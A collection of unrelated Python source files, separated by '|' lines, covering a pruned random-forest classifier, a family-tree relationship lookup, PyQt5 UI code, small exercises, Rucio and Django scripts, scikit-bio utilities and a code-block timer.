assert len(set(y).difference({-1, 1})) == 0, "Classes for binary classifier must be {-1, +1}"
def fit(self, X_forest, y_forest, X_omp, y_omp, use_distillation=False):
self._check_classes(y_forest)
self._check_classes(y_omp)
return super().fit(X_forest, y_forest, X_omp, y_omp, use_distillation=use_distillation)
def _base_estimator_predictions(self, X):
predictions_0_1 = super()._base_estimator_predictions(X)
predictions = (predictions_0_1 - 0.5) * 2
return predictions
def score_base_estimator(self, X, y):
predictions = self._base_estimator_predictions(X)
evaluation = np.sum(np.sign(np.mean(predictions, axis=1)) == y) / len(y)
return evaluation
def predict_no_weights(self, X):
"""
Apply the SingleOmpForest to X without using the weights.
Make all the base tree predictions
:param X: a Forest
:return: a np.array of the predictions of the entire forest
"""
forest_predictions = self._base_estimator_predictions(X)
weights = self._omp.coef_
omp_trees_predictions = forest_predictions[:, weights != 0]
# Here forest_pred is the probability of being class 1.
result_omp = np.mean(omp_trees_predictions, axis=1)
return result_omp
def score(self, X, y, metric=DEFAULT_SCORE_METRIC):
"""
Evaluate OMPForestClassifer on (`X`, `y`) using `metric`
:param X:
:param y:
:param metric: might be "indicator"
:return:
"""
predictions = self.predict(X)
if metric == 'indicator':
evaluation = np.abs(np.mean(np.abs(np.sign(predictions) - y) - 1))
else:
raise ValueError("Unsupported metric '{}'.".format(metric))
return evaluation
class OmpForestMulticlassClassifier(OmpForest):
DEFAULT_SCORE_METRIC = 'indicator'
def __init__(self, models_parameters):
estimator = RandomForestClassifier(**models_parameters.hyperparameters,
random_state=models_parameters.seed, n_jobs=-1)
super().__init__(models_parameters, estimator)
# question: peut-être initialiser les omps dans le __init__? comme pour le SingleOmpForest
self._dct_class_omp = {}
def fit_omp(self, atoms, objective):
assert len(self._dct_class_omp) == 0, "fit_omp can be called only once on {}".format(self.__class__.__name__)
possible_classes = sorted(set(objective))
for class_label in possible_classes:
atoms_binary = binarize_class_data(atoms, class_label, inplace=False)
objective_binary = binarize_class_data(objective, class_label, inplace=False)
# TODO: peut etre considérer que la taille de forêt est globale et donc seulement une fraction est disponible pour chaque OMP...
omp_class = OrthogonalMatchingPursuit(
n_nonzero_coefs=self.models_parameters.extracted_forest_size,
fit_intercept=True, normalize=False)
with warnings.catch_warnings(record=True) as caught_warnings:
# Cause all warnings to always be triggered.
warnings.simplefilter("always")
omp_class.fit(atoms_binary, objective_binary)
# ignore any non-custom warnings that may be in the list
caught_warnings = list(filter(lambda i: i.message != RuntimeWarning(omp_premature_warning), caught_warnings))
if len(caught_warnings) > 0:
self._logger.error(f'number of linear dependences in the dictionary: {len(caught_warnings)}. model parameters: {str(self._models_parameters.__dict__)}')
self._dct_class_omp[class_label] = omp_class
return self._dct_class_omp
def predict(self, X):
'''forest_predictions = self._base_estimator_predictions(X)
print(forest_predictions.shape)
if self._models_parameters.normalize_D:
forest_predictions /= self._forest_norms
label_names = []
preds = []
for class_label, omp_class in self._dct_class_omp.items():
label_names.append(class_label)
atoms_binary = binarize_class_data(forest_predictions, class_label, inplace=False)
print(atoms_binary.shape)
preds.append(self._make_omp_weighted_prediction(atoms_binary, omp_class, self._models_parameters.normalize_weights))
# TODO: verifier que ce n'est pas bugué ici
preds = np.array(preds).T'''
forest_predictions = np.array([tree.predict_proba(X) for tree in self._base_forest_estimator.estimators_]).T
if self._models_parameters.normalize_D:
forest_predictions /= self._forest_norms
label_names = []
preds = []
num_class = 0
for class_label, omp_class in self._dct_class_omp.items():
label_names.append(class_label)
atoms_binary = (forest_predictions[num_class] - 0.5) * 2 # centré réduit de 0/1 à -1/1
preds.append(self._make_omp_weighted_prediction(atoms_binary, omp_class, self._models_parameters.normalize_weights))
num_class += 1
preds = np.array(preds).T
max_preds = np.argmax(preds, axis=1)
return np.array(label_names)[max_preds]
def predict_no_weights(self, X):
"""
Apply the SingleOmpForest to X without using the weights.
Make all the base tree predictions
:param X: a Forest
:return: a np.array of the predictions of the entire forest
"""
forest_predictions = np.array([tree.predict_proba(X) for tree in self._base_forest_estimator.estimators_]).T
if self._models_parameters.normalize_D:
forest_predictions = forest_predictions.T
forest_predictions /= self._forest_norms
forest_predictions = forest_predictions.T
label_names = []
preds = []
num_class = 0
for class_label, omp_class in self._dct_class_omp.items():
weights = omp_class.coef_
omp_trees_indices = np.nonzero(weights)
label_names.append(class_label)
atoms_binary = (forest_predictions[num_class].T - 0.5) * 2 # centré réduit de 0/1 à -1/1
preds.append(np.sum(atoms_binary[omp_trees_indices], axis=0)/len(omp_trees_indices))
num_class += 1
preds = np.array(preds).T
max_preds = np.argmax(preds, axis=1)
return np.array(label_names)[max_preds]
def score(self, X, y, metric=DEFAULT_SCORE_METRIC):
predictions = self.predict(X)
if metric == 'indicator':
evaluation = np.sum(np.ones_like(predictions)[predictions == y]) / X.shape[0]
else:
raise ValueError("Unsupported metric '{}'.".format(metric))
return evaluation
@staticmethod
def _make_omp_weighted_prediction(base_predictions, omp_obj, normalize_weights=False):
if normalize_weights:
# we can normalize weights (by their sum) so that they sum to 1
# and they can be interpreted as impact percentages for interpretability.
# this necessits to remove the (-) in weights, e.g. move it to the predictions (use unsigned_coef) --> I don't see why
# question: je comprend pas le truc avec nonszero?
# predictions = self._omp.predict(forest_predictions) * (1 / (np.sum(self._omp.coef_) / len(np.nonzero(self._omp.coef_))))
coef_signs = np.sign(omp_obj.coef_)[np.newaxis, :] # add axis to make sure it will be broadcasted line-wise (there might be a confusion when forest_prediction is square)
unsigned_coef = (coef_signs * omp_obj.coef_).squeeze()
intercept = omp_obj.intercept_
adjusted_forest_predictions = base_predictions * coef_signs
predictions = adjusted_forest_predictions.dot(unsigned_coef) + intercept
else:
predictions = omp_obj.predict(base_predictions)
return predictions
if __name__ == "__main__":
forest = RandomForestClassifier(n_estimators=10)
X = np.random.rand(10, 5)
y = np.random.choice([-1, +1], 10)
forest.fit(X, y)
print(forest.predict(np.random.rand(10, 5)))
|
import re
from .tree import Tree
from .tree_node import TreeNode
SON = "Son"
DAUGHTER = "Daughter"
SIBLINGS = "Siblings"
PATERNAL = "Paternal"
MATERNAL = "Maternal"
UNCLE = "Uncle"
AUNT = "Aunt"
BROTHER = "Brother"
SISTER = "Sister"
IN_LAW = "In-Law"
class RelationshipTree(Tree):
"""
Family tree that supports finding relationships between tree nodes.
"""
def __init__(self, root_name, root_gender) -> None:
super().__init__(root_name, root_gender)
def get_direct_relation(self, node: "TreeNode", relationship: str):
if relationship == SON:
return node.get_children(TreeNode.GENDER_MALE)
if relationship == DAUGHTER:
return node.get_children(TreeNode.GENDER_FEMALE)
if relationship == SIBLINGS:
return node.get_siblings()
def get_parent_relation(self, node: "TreeNode", relationship: str):
result = []
parent = node.get_father()
if MATERNAL in relationship:
parent = node.get_mother()
gender = TreeNode.GENDER_MALE
if AUNT in relationship:
gender = TreeNode.GENDER_FEMALE
if parent:
result = parent.get_siblings(gender)
return result
def get_in_laws(self, node: "TreeNode", relationship: str):
result = []
spouse = node.spouse()
gender = TreeNode.GENDER_MALE
if re.search(SISTER, relationship):
gender = TreeNode.GENDER_FEMALE
if spouse:
result += spouse.get_siblings(gender)
siblings = node.get_siblings()
result += [
sibling.spouse() for sibling in siblings if not sibling.is_gender(gender)
]
return result
def get_relationship(self, name: str, relationship: str):
"""
Get related node name
"""
node = self.find_node(name)
result = []
if not node:
return "PERSON_NOT_FOUND"
if relationship in [SON, DAUGHTER, SIBLINGS]:
result = self.get_direct_relation(node, relationship)
if re.search(f"{UNCLE}|{AUNT}", relationship):
result = self.get_parent_relation(node, relationship)
if re.search(IN_LAW, relationship):
result = self.get_in_laws(node, relationship)
if not result:
return "NONE"
return " ".join([node.get_name() for node in result if node])
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'L4_gui.ui'
#
# Created by: PyQt5 UI code generator 5.9.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(513, 160)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.gridLayout = QtWidgets.QGridLayout(self.centralwidget)
self.gridLayout.setObjectName("gridLayout")
self.label_3 = QtWidgets.QLabel(self.centralwidget)
self.label_3.setObjectName("label_3")
self.gridLayout.addWidget(self.label_3, 3, 0, 1, 1)
self.jsonTB = QtWidgets.QToolButton(self.centralwidget)
self.jsonTB.setObjectName("jsonTB")
self.gridLayout.addWidget(self.jsonTB, 0, 3, 1, 1)
self.linearOutLE = QtWidgets.QLineEdit(self.centralwidget)
self.linearOutLE.setObjectName("linearOutLE")
self.gridLayout.addWidget(self.linearOutLE, 2, 2, 1, 1)
self.label_2 = QtWidgets.QLabel(self.centralwidget)
self.label_2.setObjectName("label_2")
self.gridLayout.addWidget(self.label_2, 2, 0, 1, 1)
self.jsonLE = QtWidgets.QLineEdit(self.centralwidget)
self.jsonLE.setObjectName("jsonLE")
self.gridLayout.addWidget(self.jsonLE, 0, 2, 1, 1)
self.arealOutTB = QtWidgets.QToolButton(self.centralwidget)
self.arealOutTB.setObjectName("arealOutTB")
self.gridLayout.addWidget(self.arealOutTB, 3, 3, 1, 1)
self.arealOutLE = QtWidgets.QLineEdit(self.centralwidget)
self.arealOutLE.setObjectName("arealOutLE")
self.gridLayout.addWidget(self.arealOutLE, 3, 2, 1, 1)
self.linearOutTB = QtWidgets.QToolButton(self.centralwidget)
self.linearOutTB.setObjectName("linearOutTB")
self.gridLayout.addWidget(self.linearOutTB, 2, 3, 1, 1)
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 0, 0, 1, 1)
self.StartPB = QtWidgets.QPushButton(self.centralwidget)
self.StartPB.setObjectName("StartPB")
self.gridLayout.addWidget(self.StartPB, 4, 0, 1, 1)
MainWindow.setCentralWidget(self.centralwidget)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.label_3.setText(_translate("MainWindow", "Areal output name:"))
self.jsonTB.setText(_translate("MainWindow", "..."))
self.label_2.setText(_translate("MainWindow", "Linear output name:"))
self.arealOutTB.setText(_translate("MainWindow", "..."))
self.linearOutTB.setText(_translate("MainWindow", "..."))
self.label.setText(_translate("MainWindow", "Input JSON file:"))
self.StartPB.setText(_translate("MainWindow", "Start"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
|
def rev(n):
return int(str(n)[::-1])
def check_pallindrome(n):
return n == rev(n)
def res(n):
reverse = rev(n)
n += reverse
return n if check_pallindrome(n) else res(n)
if __name__ == '__main__':
n = int(input())
print(res(n))
'''Calculate the pallindrome no from given no by adding reverse to it.
Input:
1. 195
2. 4
Output:
1. 9339
2. 8 '''
|
## 1) Make a user to enter a type of food among 'Korean', 'Chinese', and 'Japanese'.
## 2) Recommend a restuarant randomly.
import secrets
# PROBLEM : How to continue the loop until a user enters a correct value?!
def recommend_cuisine():
try:
korean_food = ['Bibimbap', 'Kimbap', 'Galbi']
italian_food = ['Lasagne', 'Italian Pizza', 'Pasta e fagioli']
japanese_food = ['Sushi', 'Udon', 'Tempura']
choice = input("What kinds of cuisines would you like to eat? (Enter 'Korean' or 'Italian' or 'Japanese') ")
if choice == 'Korean' or choice == 'korean':
result = secrets.choice(korean_food)
elif choice == 'Italian' or choice == 'italian':
result = secrets.choice(italian_food)
elif choice == 'Japanese' or choice == 'japanese':
result = secrets.choice(japanese_food)
if result:
print(f'I would like to recommend a {choice} food called "{result}". I hope you enjoy the food!')
except:
print("Please enter among 'Korean' or 'Italian' or 'Japanese' !!!!!")
recommend_cuisine()
recommend_cuisine()
# https://stackoverflow.com/questions/23294658/asking-the-user-for-input-until-they-give-a-valid-response/23294659#23294659
|
from dotenv import load_dotenv, find_dotenv
import os
from sqlalchemy import create_engine, update
load_dotenv(find_dotenv())
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
#Connect to MySQL
engine = create_engine("mysql+pymysql://"
+os.environ.get("mysql_user")
+":"+os.environ.get("mysql_password")
+"@"+os.environ.get("mysql_host")
+"/"+os.environ.get("mysql_database")+"?charset=utf8mb4")
conn = engine.connect()
me = "fbid:1529367683"
groupchat_threads = conn.execute("select thread_id from facebook_threads where num_participants > 2").fetchall()
groupchat_threads = [x[0] for x in groupchat_threads]
groupchat_threads = ','.join(groupchat_threads)
sql_base="select timestamp from facebook_messages where"
sql_addon=""
sql_addon+=" and timestamp > 1356998400"
res_sent = conn.execute(sql_base+" sender_id = '"+me+"' and thread_id not in ("+groupchat_threads+")"+sql_addon).fetchall()
res_recv = conn.execute(sql_base+" sender_id != '"+me+"' and thread_id not in ("+groupchat_threads+")"+sql_addon).fetchall()
res_sent_groupchat = conn.execute(sql_base+" sender_id = '"+me+"' and thread_id in ("+groupchat_threads+")"+sql_addon).fetchall()
res_recv_groupchat = conn.execute(sql_base+" sender_id != '"+me+"' and thread_id in ("+groupchat_threads+")"+sql_addon).fetchall()
sadboyz = conn.execute(sql_base+" thread_id = '869042309831501'"+sql_addon).fetchall()
#build a numpy array of integers from the sql strings, then convert to datetime
column_sent = np.array([int(x[0]) for x in res_sent]).astype('datetime64[s]')
column_recv = np.array([int(x[0]) for x in res_recv]).astype('datetime64[s]')
column_sent_groupchat = np.array([int(x[0]) for x in res_sent_groupchat]).astype('datetime64[s]')
column_recv_groupchat = np.array([int(x[0]) for x in res_recv_groupchat]).astype('datetime64[s]')
sadboyz = np.array([int(x[0]) for x in sadboyz]).astype('datetime64[s]')
#dataframe for counting sent, solo
df = pd.DataFrame({'ts': column_sent})
df['year'] = df['ts'].dt.year
df['month'] = df['ts'].dt.month
df_sent_count = df.groupby(by=['year', 'month']).count()#.plot(kind="bar")
df_sent_count.columns = ['#sent: 1 person chat']
#dataframe for counting received, solo
df = pd.DataFrame({'ts': column_recv})
df['year'] = df['ts'].dt.year
df['month'] = df['ts'].dt.month
df_recv_count = df.groupby(by=['year', 'month']).count()
df_recv_count.columns = ['#received: 1 person chat']
#dataframe for counting sent, groupchat
df = pd.DataFrame({'ts': column_sent_groupchat})
df['year'] = df['ts'].dt.year
df['month'] = df['ts'].dt.month
df_sent_count_groupchat = df.groupby(by=['year', 'month']).count()
df_sent_count_groupchat.columns = ['#sent: groupchat']
#dataframe for counting received, groupchat
df = pd.DataFrame({'ts': column_recv_groupchat})
df['year'] = df['ts'].dt.year
df['month'] = df['ts'].dt.month
df_recv_count_groupchat = df.groupby(by=['year', 'month']).count()
df_recv_count_groupchat.columns = ['#received: groupchat']
#dataframe for counting sadboyz
df = pd.DataFrame({'ts': sadboyz})
df['year'] = df['ts'].dt.year
df['month'] = df['ts'].dt.month
df['day'] = df['ts'].dt.day
sadboyz = df.groupby(by=['year','month', 'day']).count()
sadboyz.columns = ['sadboyz messages']
sadboyz.autofmt_xdate()
sadboyz.plot(kind="bar")
#overlay the two charts
# merged = pd.concat([df_sent_count,df_recv_count,df_recv_count_groupchat,df_sent_count_groupchat],axis=1)
# merged.plot(kind="bar")
plt.show()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright European Organization for Nuclear Research (CERN) since 2012
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import os.path
base_path = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(base_path)
os.chdir(base_path)
import json # noqa: E402
import sys # noqa: E402
import traceback # noqa: E402
from rucio.client import Client # noqa: E402
from rucio.common.exception import Duplicate # noqa: E402
UNKNOWN = 3
CRITICAL = 2
WARNING = 1
OK = 0
def main(argv):
# parameters
if argv:
rse_repo_file = argv[0]
else:
rse_repo_file = 'etc/rse_repository.json'
json_data = open(rse_repo_file)
repo_data = json.load(json_data)
json_data.close()
c = Client()
for rse in repo_data:
try:
deterministic = repo_data[rse].get('deterministic', True)
volatile = repo_data[rse].get('volatile', False)
region_code = repo_data[rse].get('region_code')
country_name = repo_data[rse].get('country_name')
staging_area = repo_data[rse].get('staging_area')
continent = repo_data[rse].get('continent')
time_zone = repo_data[rse].get('time_zone')
ISP = repo_data[rse].get('ISP')
c.add_rse(rse, deterministic=deterministic, volatile=volatile,
region_code=region_code, country_name=country_name, staging_area=staging_area,
continent=continent, time_zone=time_zone, ISP=ISP)
except Duplicate:
print('%(rse)s already added' % locals())
except:
errno, errstr = sys.exc_info()[:2]
trcbck = traceback.format_exc()
print('Interrupted processing with %s %s %s.' % (errno, errstr, trcbck))
for p_id in repo_data[rse]['protocols']['supported']:
try:
p = repo_data[rse]['protocols']['supported'][p_id]
p['scheme'] = p_id
c.add_protocol(rse, p)
except ValueError as e:
print(rse, e)
except Duplicate as e:
print(rse, e)
except Exception:
errno, errstr = sys.exc_info()[:2]
trcbck = traceback.format_exc()
print('Interrupted processing for %s with %s %s %s.' % (rse, errno, errstr, trcbck))
if __name__ == '__main__':
main(sys.argv[1:])
|
# -*- coding: utf-8 -*-
import numpy as np
def is_empty(val):
return np.isnan(val) if isinstance(val, float) else not val
|
import os
from io import BytesIO
from urllib.request import urlopen
from django.conf import settings
from django.test import LiveServerTestCase, Client
class Exercise3Test(LiveServerTestCase):
def test_media_example_upload(self):
"""
Test the upload functionality to the media_example view. Check it can be downloaded again.
"""
test_data = b'some test data'
filename = 'exercise_3_test.txt'
save_path = os.path.join(settings.MEDIA_ROOT, filename)
fp = BytesIO(test_data)
fp.name = filename
try:
c = Client()
resp = c.post('/media-example/', {'file_upload': fp})
self.assertEquals(resp.status_code, 200)
with open(save_path, 'rb') as uploaded_fp:
self.assertEquals(uploaded_fp.read(), test_data)
media_file = urlopen(self.live_server_url + '/media/' + filename)
self.assertEquals(media_file.read(), test_data)
finally:
if os.path.exists(save_path):
os.unlink(save_path)
|
from re import S
import socket
import sys
command = sys.argv[1]
s = socket.socket()
host = socket.gethostname()
port = 12345
s.connect((host, port))
s.send(command.encode())
s.close()
|
import os
import sys
import traceback
import logging
def log_exception(level):
exc_type, exc_value, exc_traceback = sys.exc_info()
for i in traceback.extract_tb(exc_traceback):
# line = (os.path.basename(i[0]), i[1], i[2])
line = (i[0], i[1], i[2])
logging.log(level, 'File "%s", line %d, in %s' % line)
logging.log(level, '\t%s' % i[3])
|
# ----------------------------------------------------------------------------
# Copyright (c) 2013--, scikit-bio development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
# ----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
import hashlib
from os import remove, makedirs
from os.path import exists, isdir
from functools import partial
from types import FunctionType
import inspect
from ._decorator import experimental
def resolve_key(obj, key):
"""Resolve key given an object and key."""
if callable(key):
return key(obj)
elif hasattr(obj, 'metadata'):
return obj.metadata[key]
raise TypeError("Could not resolve key %r. Key must be callable or %s must"
" have `metadata` attribute." % (key,
obj.__class__.__name__))
def make_sentinel(name):
return type(name, (object, ), {
'__repr__': lambda s: name,
'__str__': lambda s: name,
'__class__': None
})()
def find_sentinels(function, sentinel):
keys = []
if hasattr(inspect, 'signature'):
params = inspect.signature(function).parameters
for name, param in params.items():
if param.default is sentinel:
keys.append(name)
else: # Py2
function_spec = inspect.getargspec(function)
if function_spec.defaults is not None:
# Concept from http://stackoverflow.com/a/12627202/579416
keywords_start = -len(function_spec.defaults)
for key, default in zip(function_spec.args[keywords_start:],
function_spec.defaults):
if default is sentinel:
keys.append(key)
return keys
class MiniRegistry(dict):
def __call__(self, name):
"""Act as a decorator to register functions with self"""
def decorator(func):
self[name] = func
return func
return decorator
def copy(self):
"""Useful for inheritance"""
return self.__class__(super(MiniRegistry, self).copy())
def formatted_listing(self):
"""Produce an RST list with descriptions."""
if len(self) == 0:
return "\tNone"
else:
return "\n".join(["\t%r\n\t %s" %
(name, self[name].__doc__.split("\n")[0])
for name in sorted(self)])
def interpolate(self, obj, name):
"""Inject the formatted listing in the second blank line of `name`."""
# Py2/3 compatible way of calling getattr(obj, name).__func__
f = getattr(obj, name).__get__(None, type(None))
if hasattr(f, 'func_code'):
f2 = FunctionType(f.func_code, f.func_globals, name=f.func_name,
argdefs=f.func_defaults, closure=f.func_closure)
else:
f2 = FunctionType(f.__code__, f.__globals__, name=f.__name__,
argdefs=f.__defaults__, closure=f.__closure__)
# Conveniently the original docstring is on f2, not the new ones if
# inheritence is happening. I have no idea why.
t = f2.__doc__.split("\n\n")
t.insert(2, self.formatted_listing())
f2.__doc__ = "\n\n".join(t)
setattr(obj, name, f2)
def chunk_str(s, n, char):
"""Insert `char` character every `n` characters in string `s`.
Canonically pronounced "chunkster".
"""
# Modified from http://stackoverflow.com/a/312464/3776794
if n < 1:
raise ValueError(
"Cannot split string into chunks with n=%d. n must be >= 1." % n)
return char.join((s[i:i+n] for i in range(0, len(s), n)))
@experimental(as_of="0.4.0")
def cardinal_to_ordinal(n):
"""Return ordinal string version of cardinal int `n`.
Parameters
----------
n : int
Cardinal to convert to ordinal. Must be >= 0.
Returns
-------
str
Ordinal version of cardinal `n`.
Raises
------
ValueError
If `n` is less than 0.
Notes
-----
This function can be useful when writing human-readable error messages.
Examples
--------
>>> from skbio.util import cardinal_to_ordinal
>>> cardinal_to_ordinal(0)
'0th'
>>> cardinal_to_ordinal(1)
'1st'
>>> cardinal_to_ordinal(2)
'2nd'
>>> cardinal_to_ordinal(3)
'3rd'
"""
# Taken and modified from http://stackoverflow.com/a/20007730/3776794
# Originally from http://codegolf.stackexchange.com/a/4712 by Gareth
if n < 0:
raise ValueError("Cannot convert negative integer %d to ordinal "
"string." % n)
return "%d%s" % (n, "tsnrhtdd"[(n//10 % 10 != 1)*(n % 10 < 4)*n % 10::4])
@experimental(as_of="0.4.0")
def is_casava_v180_or_later(header_line):
"""Check if the header looks like it is Illumina software post-casava v1.8
Parameters
----------
header_line : bytes
A header line
Returns
-------
bool
``True`` for if casava v1.8+, otherwise ``False``
Examples
--------
>>> from skbio.util import is_casava_v180_or_later
>>> is_casava_v180_or_later(b'@foo')
False
>>> id_ = b'@M00176:17:000000000-A0CNA:1:1:15487:1773 1:N:0:0'
>>> is_casava_v180_or_later(id_)
True
"""
if not header_line.startswith(b'@'):
raise ValueError("Non-header line passed in.")
fields = header_line.split(b':')
return len(fields) == 10 and fields[7] in b'YN'
@experimental(as_of="0.4.0")
def safe_md5(open_file, block_size=2 ** 20):
"""Computes an md5 sum without loading the file into memory
Parameters
----------
open_file : file object
open file handle to the archive to compute the checksum. It
must be open as a binary file
block_size : int, optional
size of the block taken per iteration
Returns
-------
md5 : md5 object from the hashlib module
object with the loaded file
Notes
-----
This method is based on the answers given in:
http://stackoverflow.com/a/1131255/379593
Examples
--------
>>> from io import BytesIO
>>> from skbio.util import safe_md5
>>> fd = BytesIO(b"foo bar baz") # open file like object
>>> x = safe_md5(fd)
>>> x.hexdigest()
'ab07acbb1e496801937adfa772424bf7'
>>> fd.close()
"""
md5 = hashlib.md5()
data = True
while data:
data = open_file.read(block_size)
if data:
md5.update(data)
return md5
@experimental(as_of="0.4.0")
def remove_files(list_of_filepaths, error_on_missing=True):
"""Remove list of filepaths, optionally raising an error if any are missing
Parameters
----------
list_of_filepaths : list of strings
list with filepaths to remove
error_on_missing : bool, optional
whether or not the function should raise an ``OSError`` if a file is
not found
Raises
------
OSError
If a filepath in the list does not exist
Examples
--------
>>> from tempfile import NamedTemporaryFile
>>> from os.path import exists
>>> from skbio.util import remove_files
>>> h = NamedTemporaryFile(delete=False)
>>> exists(h.name) # it exists
True
>>> remove_files([h.name])
>>> exists(h.name) # and now it's gone
False
"""
missing = []
for fp in list_of_filepaths:
try:
remove(fp)
except OSError:
missing.append(fp)
if error_on_missing and missing:
raise OSError("Some filepaths were not accessible: %s" %
'\t'.join(missing))
@experimental(as_of="0.4.0")
def create_dir(dir_name, fail_on_exist=False, handle_errors_externally=False):
"""Create a directory safely and fail meaningfully
Parameters
----------
dir_name: string
name of directory to create
fail_on_exist: bool, optional
if true raise an error if ``dir_name`` already exists
handle_errors_externally: bool, optional
if True do not raise Errors, but return failure codes. This allows to
handle errors locally and e.g. hint the user at a --force_overwrite
options.
Returns
-------
return_value : int
These values are only returned if no error is raised:
- ``0``: directory was safely created
- ``1``: directory already existed
- ``2``: a file with the same name exists
- ``3``: any other unspecified ``OSError``
Notes
-----
Depending of how thorough we want to be we could add tests, e.g. for
testing actual write permission in an existing dir.
Examples
--------
>>> from skbio.util import create_dir
>>> from os.path import exists, join
>>> from tempfile import gettempdir
>>> from os import rmdir
>>> new_dir = join(gettempdir(), 'scikitbio')
>>> create_dir(new_dir)
0
>>> exists(new_dir)
True
>>> rmdir(new_dir)
"""
error_code_lookup = _get_create_dir_error_codes()
# pre-instanciate function with
ror = partial(_handle_error_codes, dir_name, handle_errors_externally)
if exists(dir_name):
if isdir(dir_name):
# dir is there
if fail_on_exist:
return ror(error_code_lookup['DIR_EXISTS'])
else:
return error_code_lookup['DIR_EXISTS']
else:
# must be file with same name
return ror(error_code_lookup['FILE_EXISTS'])
else:
# no dir there, try making it
try:
makedirs(dir_name)
except OSError:
return ror(error_code_lookup['OTHER_OS_ERROR'])
return error_code_lookup['NO_ERROR']
@experimental(as_of="0.4.0")
def find_duplicates(iterable):
"""Find duplicate elements in an iterable.
Parameters
----------
iterable : iterable
Iterable to be searched for duplicates (i.e., elements that are
repeated).
Returns
-------
set
Repeated elements in `iterable`.
"""
# modified from qiita.qiita_db.util.find_repeated
# https://github.com/biocore/qiita
# see licenses/qiita.txt
seen, repeated = set(), set()
for e in iterable:
if e in seen:
repeated.add(e)
else:
seen.add(e)
return repeated
def _get_create_dir_error_codes():
return {'NO_ERROR': 0,
'DIR_EXISTS': 1,
'FILE_EXISTS': 2,
'OTHER_OS_ERROR': 3}
def _handle_error_codes(dir_name, suppress_errors=False,
error_code=None):
"""Wrapper function for error_handling.
dir_name: name of directory that raised the error
suppress_errors: if True raise Errors, otherwise return error_code
error_code: the code for the error
"""
error_code_lookup = _get_create_dir_error_codes()
if error_code is None:
error_code = error_code_lookup['NO_ERROR']
error_strings = \
{error_code_lookup['DIR_EXISTS']:
"Directory already exists: %s" % dir_name,
error_code_lookup['FILE_EXISTS']:
"File with same name exists: %s" % dir_name,
error_code_lookup['OTHER_OS_ERROR']:
"Could not create output directory: %s. " % dir_name +
"Check the permissions."}
if error_code == error_code_lookup['NO_ERROR']:
return error_code_lookup['NO_ERROR']
if suppress_errors:
return error_code
else:
raise OSError(error_strings[error_code])
|
# Copyright 2014 Julia Eskew
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
from timeit import default_timer
from code_block_timer.storage import TimingDataStorage
class Globals(threading.local):
# Current module-level nest stack.
# As CodeBlockTimer objects are __enter__ed, their descriptions are pushed
# onto this stack. The stack length indicates the current nesting level.
nest_stack = []
# Current run_id.
# Set from data storage when stack size increases from 0.
# While nest stack is populated, remains at a constant value.
# Identifies all the times from the same run.
run_id = None
_m = Globals()
class CodeBlockTimer(object):
def __init__(self, block_desc, **kwargs):
self.block_desc = block_desc
self.verbose = False if 'verbose' not in kwargs else kwargs['verbose']
self.timer = default_timer
self.delimiter = kwargs.pop('delimiter', ':')
self.data_store = TimingDataStorage(**kwargs)
def __enter__(self):
if len(_m.nest_stack) == 0:
_m.run_id = self.data_store.run_id()
_m.nest_stack.append(self.block_desc)
self.start = self.timer()
return self
def __exit__(self, *args):
# Compute elapsed times.
end = self.timer()
self.elapsed_secs = end - self.start
self.elapsed = self.elapsed_secs * 1000 # millisecs
# Store the timings.
nested_desc = self.delimiter.join(_m.nest_stack)
self.data_store.store(_m.run_id, nested_desc, self.elapsed)
# Pop the stack.
_m.nest_stack.pop()
if len(_m.nest_stack) == 0:
_m.run_id = None
if self.verbose:
print '{}: elapsed time: {} ms'.format(
self.block_desc, self.elapsed
)
def __call__(self, func):
def wrapper(*args, **kwargs):
with self:
return func(*args, **kwargs)
return wrapper
|
from typing import Optional, Tuple
DEFAULT_NAMESPACE = "vernacular-ai"
DEFAULT_PROJECT_TEMPLATE = "dialogy-template-simple-transformers"
def canonicalize_project_name(
template: Optional[str] = None, namespace: Optional[str] = None
) -> Tuple[str, str]:
"""
:param template: Scaffolding will be generated using a copier template project. This is the link to the project.
:type template: str
:param namespace: The user or the organization that supports the template, defaults to "vernacular-ai"
:type namespace: str, optional
:return: None
:rtype: NoneType
"""
template = template or DEFAULT_PROJECT_TEMPLATE
namespace = namespace or DEFAULT_NAMESPACE
return template, namespace
|
'''
Copyright 2022 Airbus SAS
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
